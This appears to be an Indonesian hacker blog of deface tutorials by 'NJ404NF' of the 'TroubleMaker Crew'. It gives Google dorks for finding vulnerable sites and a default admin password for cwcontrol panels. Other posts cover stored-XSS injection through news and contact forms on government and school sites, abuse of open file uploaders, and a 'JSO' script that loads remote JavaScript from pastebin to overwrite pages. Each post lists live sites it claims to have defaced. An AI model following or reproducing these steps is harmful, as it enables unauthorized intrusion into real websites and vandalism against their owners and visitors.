Minggu, 24 November 2019

Deface Poc u/p default cwcontrol with live target


Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface (Wanjay ngepepes troos ampe bosen :v )
Tanpa basa basi monggo disimak :*
Bahan:
1.Dork: inurl:/cwcontrol (Kembangin lagi)
2.Internet :v
3.Chrome/Browser
4.Udut :v biar paru paru lu semel :)
5.Target:http://www.itm-eng.com/
Step by Step
1.pertama lu ngedorking dulu gayn :v

2.lalu pilih salah satu web yang pengen lu tusbool :"

3. Cari tempat login nya biasanya tempat loginnya ada di cwcontrol
contoh:site.co.il/[patch]/cwcontrol
menjadi:site.co.il/cwcontrol
4.Masukin User Passwordnya
User:admin
Password:cw774411


5.Kalo vuln lu langsung di arahin ke dashboard nya gayn :v
Kalo ngga ya maap anda harus coba cari yang lain hehe :v

6.Setelah masuk ke dashboard terserah mau lu apain tu web :v
Bisa lu pastekan script deface lu
bisa juga lu pastekan script jso juga

Mirror? Ok√√
Hasil Pepes:
http://www.itm-eng.com/
http://www.perfectbuilt.com/

Sampai jumpa di tutorial selanjutnya :*
Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di 2 komentar:

Senin, 18 November 2019

Deface Poc Regmem


Heyooo wasap gais :v
Kembali lagi ama gw NJ404NF wanjay :V
Kali ini gw mau ngeshare tentang deface lagi :D 
Tapi kita bisa ngepepes web pemerintah lho :v bukan druppal pastinya
Langsung simak ae kuy :*
Bahan:
1.Dork: 
inurl:/register/artikel
inurl:kontributor site:go.id
(Kembangin lagi :vroo caranya ganti ae domainnya ke sch.id,.com)
2.Script Jso cara buat klik link di bawah :v
3.Internet :/
4.Chrome/browser
Step by Step
1.Ngedorking dlu di google slur :V
2.Pilih salah satu web yang ingin lu tusbool kalo vuln ada tempat registrasinya

3.Tulis ae asal asalan :v tapi di bagian verifikasi nya jgn asal asalan ikutin yang di verifikasinya
4.Setelah itu lu langsung di arahin ke dashboard nya :"v


5. klik garis 3 di bagian atas kiri ntar muncul menu kayak gini :v
Langsung ae klik menu modal berita trus klik berita

6.Setelah masuk ke berita klik tambahkan data

7.Tulis judul (ntar buat akses) lainnya tulis asal... oh iya :v di bagian isi berita klik sumber lalu masukin script jso lu... setelah itu klik tambahkan

8.Setelah itu kalau ada tampilan kayak gini brarti lu udh bisa akses...

9.Cara akses? site.co.il/nama judulnya
Kalo ngga bisa brarti gini site.co.il/berita/detail/nama judulnya
10.Mau di mirror? bisa kok :* di def.id
11.Happy deface

Hasil Deface :
https://sulbar.kemenag.go.id/berita/detail/1ndexphp

See you di tutor selanjutnya :*
Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di Tidak ada komentar:

Minggu, 17 November 2019

Deface Poc Jso


Haiii guys :D
Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface web sekolah? WoW web sekolah anjay :"v
Tanpa basa basi monggo disimak :*
Bahan:
1.Dork
"Aplikasi Sistem Informasi Kelulusan"
inurl:/bukutamu.html site:.sch.id
Kembangin lagi vroo biar fresh kayak hari hari ku dengan kamu :*
2.Exploit:
/admin/hubungi.php
3.Script Jso
>Cara membuat script Jso>>Touched me ><
4.Internet
5.Chrome/Browser
Step by Step:
1.Kalian ngedorking dlu di google >:(
2.Pilih salah satu web yang ingin lu tusuk >///<

3.Setelah itu klik tombol hubungi kami
4.Lalu isi kolom terserah mau di isi apa kecuali di bagian pesan kalian isi dengan script jso kalian
5.Setelah itu tambahkan exploit /admin/hubungi.php di web tersebut menjadi site.sch.id/[patch]/admin/huhungi.php
contoh:
https://smk5palembang.sch.id/kelulusanxyz/admin/hubungi.php
6.Mirror? Bisa kok di https://defacer.id
6.Happy deface :D


Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di 1 komentar:

Cara Membuat Script JSO

Kembali lagi ama gw NJ404NF kali gw mau berbagi tentang cara membuat script JSO.
Tapi apa itu JSO?
Jso adalah singkatan dari JavaScript Overlay
Para defacer menggunakan jso untuk mengubah tampilan website dengan script simple.
Ok tanpa basa basi berikut Step by Stepnya:
1.Pertama kalian klik link di bawah ini
>>Sentuh aku mazz :*
2.Lalu masukin script deface lu
3.Klik Convert
4.Copy code hexal desimalnya

5.Lalu masuk ke https://pastebin.com/ dan klik new paste

6.Ketik code berikut di new paste
document.documentElement.innerHTML=String.fromCharCode(code hexal)
Contoh:
document.documentElement.innerHTML=String.fromCharCode(6,7,8,9,3) 
di new paste,kemudian klik create new paste
7.Setelah itu klik raw
8.Lalu copy link dari hasil pastebin mu tadi
9.Masukin link yang tadi ke kode berikut

<script type="text/javascript" src="link pastebinmu"></script>
Contoh:
<script type="text/javascript" src="https://pastebin.com/raw/zZLe4HYW"></script>

Selesai... Sampai jumpa di tutorial selanjutnya

Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di Tidak ada komentar:

Sabtu, 16 November 2019

JSO Creator

JSO Creator

Tools Jso Creator





@2k19 Copyright by NJ404NF

Diposting oleh di Tidak ada komentar:

Rabu, 13 November 2019

Deface Poc Kawaii File Hosting



Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface (Wanjay ngepepes troos ampe bosen :v )
Tanpa basa basi monggo disimak :*

Bahan - Bahan
1.Internet
2.Chrome Atau Lainnya
3.File deface lu : txt,jpg,png,gif
4.Dork (Kembangin) :
~Kawaii File Hosting
~Kawaii File Host
~host file uploader
~hosting file uploader

Step by Step
1.Ngedorking dulu lha di google



2.Pilih Yang Ingin Lu Tusbool :v
3.Kalau Vuln Ada Kata *Drop File*
4.Jika Vuln Silahkan Kamu Klik *Drop File*



5.Pilih Script Deface Kamu :/
6.Sesudah Upload Maka Akan Keluar Link Aksesnya


7.Cara Akses? Klik Link. Gabisa di klik? Use Your Brain SterQ :D
8.Happy Deface

Hasil Deface:
https://u.trs.tn/kmacf.txt

Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di Tidak ada komentar:

Jumat, 08 November 2019

Deface Poc Druppal Hidden Uploader



Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface (Wanjay ngepepes lagi :v)
Tanpa basa basi monggo disimak :*

Bahan-Bahan :

1.Dork:
allowed file types: png gif jpg txt site:gov
allowed file types: png gif jpg txt site:com
allowed file types: png gif jpg txt site:edu
allowed file type txt jpg html gif site:
(Kembangin ya budjank :" tambahin dengan domain yg lu tau: .com .gov .id .edu .uk dll)

2.Chrome/Browser  serah lu :v
3.Internet '-'
4.Ngopi + udud biar paru paru lu semel :)

Step by Step:

1.Lu ngedorking dulu di google buat cari web perawan :/
2.Pilih web yg pengen lu tusbool :D

3.Lu cari tempat file uploadnya :v


4.Klik pilih file trus pilih file heker lu ext txt ato gk jpg (Di websitenya support yg mana extensinya kalo ada .txt ya txt ae :v)

5.Klik tombol uploadnya

6.Tunggu sebentar lalu klik script yg udh di upload tadi,kalo ga bisa ya use your brain

7.Happy Deface :)
Hasil Deface:
https://prevention.nd.gov/files/pfs-uploads/404.txt

Author:NJ404NF
Greets:TroubleMaker Crew

Diposting oleh di Tidak ada komentar:

Kamis, 07 November 2019

Cara Deface Poc PhUploader



Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface

Bahan-Bahan :

1.Dork:

# intitle:Powered by phUploader

Kembangkan lagi ya mblo :v

2.Internet pokoknya jangan hotspot temen kasian temen lu :(

3.Jomblo biar ga keganggu :v

4.File Text kalian..
Kalo pengen variasi pakai text to ASCII aja cari di gugel.


Step by Step :

1. Dorking lah di gugel seperti biasa.

2. Pilih target yang Perawan ga perawan serah lu soalnya udh sering di tusbool :v



3. Setelah terbuka kalian akan langsung masuk ke Form Upload File nya





4. klik browse lalu pilih file text kalian.

5. lalu kalian klik tombol upload, itu kan ada 2 tombol yang kiri biasanya tombol upload





6. Setelah sukses akan muncul url kalian..





7. Aksesnya tinggal klik aja Url nya, klo ga bisa di klik, ya Use Your Brain :v

8. Selesai,, terserah mau di apain setelah itu :v
9.Happy Deface :)



Hasil Deface:

http://collierstech.ru/uploads/1572750638.txt
http://www.lamagnacappella.altervista.org/uploads/1572769933.jpg
http://subland.info/upload/404.txt

Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di 1 komentar:

Deface Poc Kineditor

Heyo Wasaap Guys :"v kembali lagi ama aing NJ404NF kali ini w mau tutor mengenai deface tapi apa itu deface?
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security (vulnerability) yang ada di dalam sebuah situs website.
Yodah gausah banyak omong :"v
Bahan:
1.File deface lu exstensi .html / .txt
2.Dork:inurl:uploadbutton 
3.Kopi biar kayak anak indie :v
4.Rokok Wajiib :v
5.Jomblo (biar gaada yg ganggu :")
6.Jangan lupa paketan or wifi  -_

Step by Step:
1. klean buka browser/chrome (terserah lu penting bisa buat browsing)
Disini gw pake Chrome ya budjank :"
2.dorking buat cri web perawan :v 
3.Pilih 1 Web yg ingin lu deface/heked bey
4.Klik tombol upload trus lu pilih script deface lu extensi .html/.txt serah lu

5.Copy tulisan yg Gua bunderin :v trus lu pastekan di websitenya 
ex:http://site.co.il/kindeditor/examples/uploadbutton.html
Jadi:https://site.co.il/kindeditor/attached/file/20191107/20191107112624_46650.html
6.Klik enter/tunggu reolading 
7.Happy defacing

Hasil Deface:http://www.ruiqichina.com/kindeditor/attached/file/20191107/20191107112624_46650.html

Author:NJ404NF
Greets:TroubleMaker Crew
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)